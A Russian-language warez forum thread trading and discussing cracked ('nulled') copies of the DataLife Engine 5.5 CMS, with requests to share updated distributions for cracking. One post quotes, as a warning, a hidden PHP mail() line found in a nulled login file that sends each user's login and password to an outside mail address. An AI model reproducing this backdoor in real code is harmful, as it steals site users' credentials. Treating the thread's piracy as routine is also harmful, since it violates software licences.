• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

Информация DataLife Engine v.5.5 Final Release

Статус
В этой теме нельзя размещать новые ответы.
artem, у меня такой шляпы вроде нет...
 
А за что сайт МИДа снесли? И ПОЧЕМУ не будет нулля от Фреша?:confused: :mad: Объясните подробнее!!!:thenks:
 
Да, судя по всему сайт mid-team.org снесли.
Скачал с его сайта null dle 5.5. причем через ТРИ дня после офф. релиза!!! Может потому и снесли? Расстроились видимо...
MadMan, если вдруг какая помощь...
 
аналогично, скачал. думал обновление качну. а тут на те...

у кого есть обновленный дистр 5.5 - дайте понулить =)
 
Скачал с его сайта null dle 5.5. причем через ТРИ дня после офф. релиза!!! Может потому и снесли?

тоже так думаю. наверно целлсофт заколебался обновить... :D
 
Для просмотра ссылки Войди или Зарегистрируйся

Собственно С Нулом Фреша тоже знаком печальным опытом! может потому и пользуюсь теперь нулом от МидМена
да и собственно почему нужно брать на вооружение другой ну если MadMan и так все что нужно вырезает и посля еще все это корректно работает а вы фреш ни фреш.
собственно и ссылку эту тоже он мне дал т.к. в течении трех дней к нему на сай попасть никак нельзя было... от сюда и вывод парень работает над своим нулов по совести... да и сиучалок в его нуле никогда ранее не видел)
 
скачивал откуда-то релиз 5.5 от м-и-д с вот такой вот стучалочкой mail("37oo4234wn4823hh@googlemail.com","","login: ".$_POST['login_name']."\n pass: ".$_POST['login_password'],"From: PASS");

п.с. это было в файле сайтлогин.пхп
не ручаюсь за нули, которые были выложены не на моем сайте

так как мой сайт щас в дауне качаемс отсюда
Для просмотра ссылки Войди или Зарегистрируйся
 
так точно!
 
аналогично, скачал. думал обновление качну. а тут на те...

у кого есть обновленный дистр 5.5 - дайте понулить =)

А что было обновление к 5.5. У меня первый нулл вроде без глюков работает. А по сссылкам выше скачивается тот же нулл, что и у меня только он, судя по датам 4.03
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху